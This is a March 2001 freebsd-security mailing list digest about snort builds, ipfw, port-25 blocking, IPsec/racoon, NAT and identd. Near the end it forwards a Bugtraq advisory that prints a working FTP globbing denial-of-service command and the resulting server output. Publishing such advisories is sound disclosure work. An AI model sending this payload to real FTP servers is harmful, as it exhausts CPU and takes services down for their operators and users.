Date: Wed, 14 Mar 2001 19:18:31 +0100
From: Gerhard Sittig
To: freebsd-security@freebsd.org
Subject: Re: ICMP attacks
Message-ID: <20010314191831.W20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@freebsd.org
References: <980521178.3a7190da7ba07@mail.marketnews.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from mit@mitayai.net on Wed, Mar 14, 2001 at 02:29:17AM -0500
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Mar 14, 2001 at 02:29 -0500, Will Mitayai Keeso Rowe wrote:
>
> i'd love to use snort, but i keep getting this:
>
> [castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install
> ===> Cleaning for snort-1.7
> ===> Extracting for snort-1.7
> >> Checksum OK for snort-1.7.tar.gz.
>
> gzip: stdout: Broken pipe
> ===> Patching for snort-1.7
> ===> Configuring for snort-1.7
>

This is only a problem *if* the configure / build steps fail, too.
But if they do, you should cite _these_ messages.


virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

From owner-freebsd-security Wed Mar 14 13:11:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ruhr.de (in-ruhr4.ruhr.de [212.23.134.2]) by hub.freebsd.org (Postfix) with SMTP id D7C8937B71C for ; Wed, 14 Mar 2001 13:10:56 -0800 (PST) (envelope-from ue@nathan.ruhr.de)
Received: (qmail 3421 invoked by uid 10); 14 Mar 2001 21:10:54 -0000
Received: (from ue@localhost) by nathan.ruhr.de (8.11.3/8.11.2) id f2EL6EL94714 for security@FreeBSD.ORG; Wed, 14 Mar 2001 22:06:14 +0100 (CET) (envelope-from ue)
Date: Wed, 14 Mar 2001 22:06:14 +0100
From: Udo Erdelhoff
To: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314220613.L83336@nathan.ruhr.de>
Mail-Followup-To: security@FreeBSD.ORG
References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com>; from cjclark@reflexnet.net on Tue, Mar 13, 2001 at 11:20:14PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote:
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the source indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations.

Hmm, I have the following setup: A -current box mounts /usr/src5 and
/usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails
as soon as there's a fragmented NFS packet - the fragments are dropped
by rule -1. I switched to a kernel without ipfw to be able to complete
the installworld.

The kernel was PRE_SMPNG. Were there any bugfixes in this area or
should I try to reproduce the problem with a current -current?

/s/Udo
-- 
I figure that if the burned hand teaches best, then the entire scorched
epidermis simply has to get its point across.
From owner-freebsd-security Wed Mar 14 14:14:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 154C737B718 for ; Wed, 14 Mar 2001 14:14:44 -0800 (PST) (envelope-from sziszi@petra.hos.u-szeged.hu)
Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id XAA02100; Wed, 14 Mar 2001 23:14:42 +0100 (MET)
Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14dJXW-0004EX-00 for ; Wed, 14 Mar 2001 23:14:42 +0100
Date: Wed, 14 Mar 2001 23:14:42 +0100
From: Szilveszter Adam
To: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314231442.F12391@petra.hos.u-szeged.hu>
Mail-Followup-To: Szilveszter Adam , freebsd-security@FreeBSD.ORG
References: <200103141333.f2EDX0J19096@fusion.borderware.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>; from bmw@borderware.com on Wed, Mar 14, 2001 at 08:33:00AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Ralph Huntington wrote:
> > > (This is one case where blocking of port 25 by ISPs is a good thing.)

Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
of such a setup right now. While we are at it, why not firewall off the
whole Net by just allowing a few things through proxies like www and ftp
just so that a few morons are safe? Anyways, who would use such esoteric
things as "cvsps" or "cvsup" and what are these etc. You can see where this
is leading. Unfortunately network administration only looks simple if you
are the one sitting at the admin console. Otherwise, it can quickly become
a set of annoying limitations that hinder you @work or @play. Cool. I
really feel like paying a lot for Internet access with these conditions.

In the meantime, I guess most virus infections are due to the fact that
(l)users go to really great lengths to open anything that says "Big tits
inside" or "Check out this nice music." Today, it's email. Tomorrow, it
will likely be mobile devices. The day after tomorrow... who knows?

Sorry for the OT, but I really felt I needed to tell this some time...
not all FreeBSD/UNIX aficionados are sysops at the same time, much less
network ops at their place.

-- 
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Wed Mar 14 15:47:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 314E737B77B for ; Wed, 14 Mar 2001 15:47:51 -0800 (PST) (envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id SAA03451; Wed, 14 Mar 2001 18:47:45 -0500
Date: Wed, 14 Mar 2001 18:47:45 -0500 (EST)
From: Mikhail Kruk
To: Szilveszter Adam
Cc:
Subject: Re: Sophos and Virus return mail
In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Ralph Huntington wrote:
> > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
> of such a setup right now. While we are at it, why not firewall off the
> whole Net by just allowing a few things through proxies like www and ftp
> just so that a few morons are safe? Anyways, who would use such esoteric
> things as "cvsps" or "cvsup" and what are these etc. You can see where this
> is leading. Unfortunately network administration only looks simple if you
> are the one sitting at the admin console. Otherwise, it can quickly become
> a set of annoying limitations that hinder you @work or @play. Cool. I
> really feel like paying a lot for Internet access with these conditions.

My DSL provider, Mindspring, blocks port 25 and I am quite happy about it.
Of course send-pr doesn't work out of the box, but you can configure
everything to work through their mail server. Blocking one port is very
far from blocking all ports except 80; it's a bad analogy. This measure is
directed at a very specific kind of activity (spamming) and does not
affect the vast majority of the users.

From owner-freebsd-security Wed Mar 14 16:41:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 53C1D37B718 for ; Wed, 14 Mar 2001 16:41:01 -0800 (PST) (envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id TAA24722; Wed, 14 Mar 2001 19:55:59 -0500 (EST) (envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 19:55:59 -0500 (EST)
From: Ralph Huntington
To: Mikhail Kruk
Cc: Szilveszter Adam , freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

No, Ralph Huntington did not write that. He responded to that, as you have
done. Someone else said that about port 25 and ISPs. So let's drop it
already.

On Wed, 14 Mar 2001, Mikhail Kruk wrote:

> > > Ralph Huntington wrote:
> > > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> >
> > Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
> > of such a setup right now. While we are at it, why not firewall off the
> > whole Net by just allowing a few things through proxies like www and ftp
> > just so that a few morons are safe? Anyways, who would use such esoteric
> > things as "cvsps" or "cvsup" and what are these etc. You can see where this
> > is leading. Unfortunately network administration only looks simple if you
> > are the one sitting at the admin console. Otherwise, it can quickly become
> > a set of annoying limitations that hinder you @work or @play. Cool. I
> > really feel like paying a lot for Internet access with these conditions.
>
> My DSL provider, Mindspring, blocks port 25 and I am quite happy about it.
> Of course send-pr doesn't work out of the box, but you can configure
> everything to work through their mail server. Blocking one port is very
> far from blocking all ports except 80; it's a bad analogy. This measure is
> directed at a very specific kind of activity (spamming) and does not
> affect the vast majority of the users.

From owner-freebsd-security Wed Mar 14 18:05:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id CFB7937B71A for ; Wed, 14 Mar 2001 18:05:39 -0800 (PST) (envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001) id D4D125BF9; Wed, 14 Mar 2001 18:05:53 -0800 (PST)
Date: Wed, 14 Mar 2001 18:05:53 -0800
From: dannyman
To: Jim Durham
Cc: freebsd-security@freebsd.org
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314180553.M3500@dell.dannyland.org>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: ; from durham@w2xo.pgh.pa.us on Tue, Mar 13, 2001 at 11:54:01PM -0500
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Mar 13, 2001 at 11:54:01PM -0500, Jim Durham wrote:
> Great discussion going on about Sophos and Amavis!
>
> This may be something I'm missing, but there are several
> virii that apparently send no "envelope from" address when
> they generate virus mail. One that comes to mind is the
> stupid "Snow White" thing.

[...]

I get a couple of those a day in my root folder. At least.

I just check the originating IP and make sure it is not one of my users. :)

-d

From owner-freebsd-security Wed Mar 14 18:37:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id 323CC37B718; Wed, 14 Mar 2001 18:37:14 -0800 (PST) (envelope-from sakane@ydc.co.jp)
Received: from localhost ([3ffe:501:4819:1000:260:1dff:fe21:f766]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f2F2aRY24974; Thu, 15 Mar 2001 11:36:27 +0900 (JST)
To: Bob@Talarian.Com
Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: Your message of "Sun, 11 Mar 2001 22:39:16 -0600" <3AAC52F4.1000602@Talarian.Com>
References: <3AAC52F4.1000602@Talarian.Com>
X-Mailer: Cue version 0.6 (010224-1625/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20010315113552W.sakane@ydc.co.jp>
Date: Thu, 15 Mar 2001 11:35:52 +0900
From: Shoichi Sakane

> As near as I can tell, I have to run racoon and configure it for
> pre-shared keys to talk to the cisco. But I don't think the racoon is
> even starting right. I get this message: "ERROR:
> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
> directory." Happens with the config files I've written and the stock
> ones. I'm running a freshly sup'd box with racoon-20010222a built from
> ports.

I think there was another reason why racoon couldn't work. This message
means the SPD is empty. It doesn't mean an error happened. The tag "ERROR"
should be fixed.

From owner-freebsd-security Wed Mar 14 18:59:29 2001
Date: Thu, 15 Mar 2001 09:59:16 +0700 (ICT)
From: Olivier Nicole
To: freebsd-security@FreeBSD.ORG
In-reply-to: (message from Jim Durham on Wed, 14 Mar 2001 11:31:05 -0500 (EST))
Subject: Re: Sophos and Virus return mail

Hi,

I would like to add my couple of cents to the topic.

Actually you should check Reply-To:,
From:, then the envelope From, in that order. And in any case copy the
email to one of those guys who monitor ISPs with open relays and publish
lists for banning.

Port 25 in my opinion MUST be closed, as far as it goes for individual
users. In fact it could be closed even for corporate users, as one bad
corporate customer could cause the whole ISP address range to be banned.

A centralised email exchange point is the only efficient way for an ISP to
control that their users are not doing spam.

As far as relaying, it should be open from outside to inside (considering
the frontier is the ISP email exchange) and from inside to outside. But not
from outside to outside.

To address mobile configuration, say a customer using his laptop outside
the ISP domain, relay can be set up to open from outside to outside, for a
limited period of time (usually 10 minutes) provided that the laptop first
does a connection with POP or IMAP. The laptop identifies as a valid user of
the ISP so he is allowed to use the ISP email gateway for a while.

Olivier

From owner-freebsd-security Wed Mar 14 20:21:37 2001
Date: Wed, 14 Mar 2001 22:21:30 -0600
From: jomor
Organization: ahpcns
To: freebsd-security@freebsd.org
Subject: Re: IPSEC tunnel without gif?

jomor wrote:
> I've been setting up a VPN with tunnel mode IPSEC and things are going
> OK so far but in searching the list archives, I've found some stuff that
> seems to imply that gif tunnels are not needed for tunnel mode. Is this
> true? I've only gotten it to work by pre-configuring the gif tunnel, but
> now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode
> IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the
> X-bone project.
>
> seeking enlightenment ...jgm

Replying to my own post for those who are interested...

I have set up a simple test network to figure this out. It's similar to the
one in the ipsec.html page of the handbook except that I added a router to
split up the segment between the gateways in order to better simulate "the
Internet" piece. Routes were in place only to provide connectivity between
the external interfaces of the "tunnel endpoint gateway" machines. The
router sitting in the middle of the whole thing had no knowledge of the
"private" networks. NAT was not enabled anywhere.

The ipsec.conf files are just like the handbook page commands except that I
made a version for esp only and another version for ah (not "ah-old") and I
specified "-m tunnel" instead of "-m any".

After executing setkey I was able to ping the remote hosts for at least a
little while. I was not able to connect long enough to do anything useful.
Flushing and reloading the ipsec.conf file didn't help.
Only a reboot would get it going again (but not for long).

I ran some traces with a Network General sniffer and things looked as I
expected while the pings were working. When the pings stopped working I
could see that one of the gateways continued to transmit the pings, which
did get to the remote gateway. The gateway that received the pings was
transmitting ARP requests but strangely, it was trying to get the hardware
address of the other tunnel endpoint rather than that of the router in the
middle. Since the ARP requests were never answered, the ping response was
never transmitted. This behavior was identical for both ah and esp tunnels.

After rebooting all the machines, I created the gif tunnels and executed
setkey. I was able to ftp some 1-5 MB files this way. I left the setup
running over night so I'll see if it's still functioning in the morning.
I'll be doing some traces with the gif setup for comparison as well.

...jgm

From owner-freebsd-security Wed Mar 14 20:40:46 2001
From: "Mike Burgett"
To: "jomor"
Cc: "freebsd-security@FreeBSD.ORG"
Date: Wed, 14 Mar 2001 20:40:35 -0800
Subject: Re: IPSEC tunnel without gif?

On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote:
>The gateway that received the pings was transmitting ARP
>requests but strangely, it was trying to get the hardware
>address of the other tunnel endpoint rather than that of
>the router in the middle. Since the ARP requests were never
>answered, the ping response was never transmitted.

This sounds an awful lot like:

http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079

I added a static arp entry for my router awhile back to work around this
very thing.

Thanks,
Mike

From owner-freebsd-security Wed Mar 14 23:39:23 2001
Date: Wed, 14 Mar 2001 23:39:15 -0800
From: "Crist J. Clark"
To: Szilveszter Adam
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail

On Wed, Mar 14, 2001 at 11:14:42PM +0100, Szilveszter Adam wrote:
> > Ralph Huntington wrote:
> >
> > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> Yes. And makes using eg send-pr(1) real fun(TM).

Huh? send-pr(1) just uses sendmail. It gets forwarded the same way all of
your other mail does. What am I missing?
-- 
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security Wed Mar 14 23:43:18 2001
Date: Wed, 14 Mar 2001 23:43:17 -0800
From: "Crist J. Clark"
To: Udo Erdelhoff
Cc: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?

On Wed, Mar 14, 2001 at 10:06:14PM +0100, Udo Erdelhoff wrote:
> On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote:
> > Rule -1 is given for any packet dropped, but not dropped due to a user
> > rule or the default rule. A quick look at the source indicates the
> > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > only such situations.
>
> Hmm, I have the following setup: A -current box mounts /usr/src5 and
> /usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails
> as soon as there's a fragmented NFS packet - the fragments are dropped
> by rule -1.

The only time UDP packets would be dropped is when a m_pullup() call
fails. I am not sure what that implies, but it does not sound good. I don't
think that should be failing.
-- 
Crist J.
Clark                                cjclark@alum.mit.edu

From owner-freebsd-security Thu Mar 15 00:02:40 2001
Date: Tue, 13 Mar 2001 10:49:27 -0800
From: Robert Clark
To: Ted Mittelstaedt
Cc: Bob Van Valzah, pW, FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel

Ted, do you know of any online guidelines to writing protocols that
function well with NAT?

Or maybe a list of protocols that don't work well with NAT?

Thanks, [RC]

On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote:
> >-----Original Message-----
> >From: owner-freebsd-questions@FreeBSD.ORG
> >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> >Sent: Monday, March 12, 2001 8:07 AM
> >To: pW
> >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
> >Subject: Re: Racoon Problem & Cisco Tunnel
> >
> >
> >Yes. The five DSL setups with which I'm familiar all grant at least one
> >public address per house. I believe all are static, but one might be
> >dynamic. Interference with protocols like IPSec is one of the reasons
> >why I'd make a public address a requirement when choosing a DSL
> >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> >possible. Let's hasten the deployment of IPv6.
> >
> -snip-
>
> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market. I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it. But, anyone
> doing a new protocol today is a fool if it can't work through a NAT.
>
>
> Ted Mittelstaedt                      tedm@toybox.placo.com
> Author of: The FreeBSD Corporate Networker's Guide
> Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Thu Mar 15 01:40:17 2001
Date: Thu, 15 Mar 2001 01:39:55 -0800
From: "Crist J. Clark"
To: Robert Clark
Cc: Ted Mittelstaedt, Bob Van Valzah, pW, FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel

On Tue, Mar 13, 2001 at 10:49:27AM -0800, Robert Clark wrote:
>
> Ted, do you know of any online guidelines to writing protocols
> that function well with NAT?
>
> Or maybe a list of protocols that don't work well with NAT?

One of the problems with NAT is that there are no standards. It supports
whatever the NAT software vendor felt like supporting. In general, to be
safe, the list of protocols that do not work well with NAT are,

1) Any protocol that is not TCP.

Except you usually can get by with UDP, but watch for timeouts that can
vary from seconds to hours. ICMP? Some might work, some might not, again,
depends on the vendor. IPsec? Well, NAT completely breaks AH, but the code
to NAT IPsec is completely trivial which does not imply that a lot of
vendors do. Of course, NAT may or may not cause your IKE negotiations to
fail... depending on the NAT implementation _and_ the IPsec implementation.
Any other protocol? Maybe GRE, but good luck with anything else.

Madness I tell you, madness. As RFC1631 says (an exact quote),

  The negative characteristics [of NAT] are:
  . . .
  5. Problems with SNMP, DNS, ... you name it.
                                  ^^^^^^^^^^^

Damn straight; we've known all of this from the beginning.
And on top of this, whatever you are running at the application layer
might not like NAT either. Some minor protocols like, oh, FTP, need to have
data changed at the application layer to function. The NAT software
effectively has to act as an application proxy.
-- 
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security Thu Mar 15 02:20:29 2001
From: "Ted Mittelstaedt"
To: "Robert Clark"
Cc: "Bob Van Valzah", "pW"
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Thu, 15 Mar 2001 02:10:56 -0800

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Robert Clark
>
>Ted, do you know of any online guidelines to writing protocols
>that function well with NAT?
>

The rule of thumb is don't embed port information in the data payload.
But here's some references:

K. Egevang, P. Francis, "The IP Network Address Translator (NAT)", RFC 1631,
May 1994.

T. Hain, "Architectural Implications of NAT", Internet Draft, July 1998.

Matt Holdrege, Pyda Srisuresh, "IP Network Address Translator (NAT)
Protocol Issues", Internet Draft, August 1998.

Yakov Rekhter, "Implications of NATs on the TCP/IP architecture", Internet
Draft, August 1998.

P. Srisuresh, Matt Holdrege, "IP Network Address Translator (NAT)
Terminology and Considerations", Internet Draft, July 1998.

This list is from a post that Jim Gray made to the Questions list back in
October that was very good.

>
>Or maybe a list of protocols that don't work well with NAT?
>

This is entirely implementation dependent. For example, Cisco has a list
somewhere on their website that shows the ones they do and don't support.
I don't know if anyone has made up a list for natd.
Ted Mittelstaedt                      tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Thu Mar 15 10:20:02 2001
From: "Ronan Lucio"
Subject: Port 113
Date: Thu, 15 Mar 2001 15:19:20 -0300

Hi all,

Could anybody tell me when I need to allow port 113 in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server. Does this port
need to allow connections for the DNS service to work?

Thanks
Ronan Lucio

From owner-freebsd-security Thu Mar 15 10:24:57 2001
From: Jason DiCioccio
To: 'Ronan Lucio', security@FreeBSD.ORG
Subject: RE: Port 113
Date: Thu, 15 Mar 2001 10:24:49 -0800

No, you don't need it for DNS, but it's identd.. Used by some daemons to
determine what the lusername of the client that's connecting is.

-------
Jason DiCioccio
Evil Genius
Unix BOFH
mailto:jasond@epylon.com
415-593-2761 Direct & Fax
415-593-2900 Main

Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com

-----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: Thursday, March 15, 2001 10:19 AM
To: security@FreeBSD.ORG
Subject: Port 113

Hi all,

Could anybody tell me when I need to allow port 113 in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server. Does this port
need to allow connections for the DNS service to work?

Thanks
Ronan Lucio

From owner-freebsd-security Thu Mar 15 10:58:13 2001
From: "Ronan Lucio"
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 15:57:37 -0300
> >From: "Ronan Lucio"
> >Date: Thu, 15 Mar 2001 15:19:20 -0300
>
> >Could anybody tell me when I need to allow port 113
> >in the firewall?
>
> >What services use this port?

Sorry, I wanted to say: What applications use this port? What applications
use the auth service?

> pau-amma[1] grep 113 /etc/services
> auth            113/tcp    ident    tap    #Authentication Service
> auth            113/udp    ident    tap    #Authentication Service
>
> >For example: I have a computer that is only a DNS server.
> >Does this port need to allow connections for the DNS service to work?
>
> No.
>
> Cheers,
> david
> --
> David Wolfskill              dhw@whistle.com         UNIX System Administrator
> Desk: 650/577-7158   TIE: 8/499-7158   Cell: 650/759-0823
>

From owner-freebsd-security Thu Mar 15 11:09:51 2001
From: Nate Williams
Date: Thu, 15 Mar 2001 12:08:03 -0700 (MST)
To: Robert Clark
Cc: Ted Mittelstaedt, Bob Van Valzah, pW, FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel

> Ted, do you know of any online guidelines to writing protocols
> that function well with NAT?

Here's some:

1) Single TCP socket (UDP requires special NAT code to work correctly).
2) The client must initiate the connection
3) The client's local port must *NOT* be fixed.
4) The server's remote port must be fixed
5) All port/address information must be contained within the packet
   headers (no information must be passed in the contents of the packets).

If your protocol follows the above guidelines, it should work fine under
NAT.

Nate

ps. Did I miss anything obvious?

> Or maybe a list of protocols that don't work well with NAT?

Any protocol that doesn't follow the above convention. DNS (which uses UDP)
is an 'exception' in that most NAT implementations contain special code to
deal with it.

> On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote:
> > >-----Original Message-----
> > >From: owner-freebsd-questions@FreeBSD.ORG
> > >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> > >Sent: Monday, March 12, 2001 8:07 AM
> > >To: pW
> > >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
> > >Subject: Re: Racoon Problem & Cisco Tunnel
> > >
> > >
> > >Yes. The five DSL setups with which I'm familiar all grant at least one
> > >public address per house. I believe all are static, but one might be
> > >dynamic. Interference with protocols like IPSec is one of the reasons
> > >why I'd make a public address a requirement when choosing a DSL
> > >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> > >possible. Let's hasten the deployment of IPv6.
> > >
> > -snip-
> >
> > NAT has proven itself reliable and vital and idiot engineers that design TCP
> > protocols that assume everyone has a public IP number are just architecting
> > their own failures, and their protocol's subsequent minimizing by the
> > market. I have some sympathy for protocols like IPSec that came to be
> > during the same time - but organizational-to-organizational IPSec tunnels
> > don't have to pass through the NAT - they can terminate on it. But, anyone
> > doing a new protocol today is a fool if it can't work through a NAT.
> >
> >
> > Ted Mittelstaedt                      tedm@toybox.placo.com
> > Author of: The FreeBSD Corporate Networker's Guide
> > Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Thu Mar 15 11:20:49 2001
From: Nate Williams
Date: Thu, 15 Mar 2001 12:20:30 -0700 (MST)
To: "Ronan Lucio"
Subject: Re: Port 113

> Could anybody tell me when I need to allow port 113
> in the firewall?

*Need* for auth is a strong word. However, it does tend to speed up email
transfers if you enable a version that always responds true. So, any
external SMTP servers you have *should* have this port enabled.

> What services use this port?

I know that SMTP uses it, and I believe that ftpd uses it, and I believe
irc also uses it.

> For example: I have a computer that is only a DNS server.
> Does this port need to allow connections for the DNS service to work?

I don't believe so, but someone will certainly correct me if I'm wrong.

Nate

From owner-freebsd-security Thu Mar 15 12:21:23 2001
Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET)
From: Attila Nagy
Subject: Multiple vendors FTP denial of service (fwd)

FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
-STABLE.

---------- Forwarded message ----------
Date: Thu, 15 Mar 2001 09:34:09 +0100
From: "Frank DENIS (Jedi/Sector One)"
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Multiple vendors FTP denial of service

- Proftpd built-in 'ls' command has a globbing bug that allows remote
denial-of-service.

Here's a simple exploit, tested on the Proftpd site :

$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out.
Connection closed

That command takes 100% CPU time on the server. It can lead to an easy
DOS even if few remote simultaneous connections are allowed.

Other FTP servers may be concerned as well. Here are various tries :

- NetBSD FTP showed the same behavior as Proftpd :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out.
Connection closed

So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
possible DOS. Other BSD FTP may be affected as well.

- Microsoft FTP Service (Version 5.0) seems also confused by the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)

- Publicfile refuses the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed
and displayed.

- PureFTPd (any version) is not vulnerable. Result is "Simplified
wildcard expression to *" and the 'ls *' output.

Maintainers of vulnerable servers have been warned of this bug.

-- 
 -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
         LINAGORA SA (Paris, France) : http://www.linagora.com

From owner-freebsd-security Thu Mar 15 12:35:29 2001
Message-ID: <3AB1261F.23B8BE75@algroup.co.uk>
Date: Thu, 15 Mar 2001 20:29:19 +0000
From: Adam Laurie
Organization: A.L. Group plc
To: Nate Williams
Cc: Ronan Lucio, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com>

Nate Williams wrote:
> 
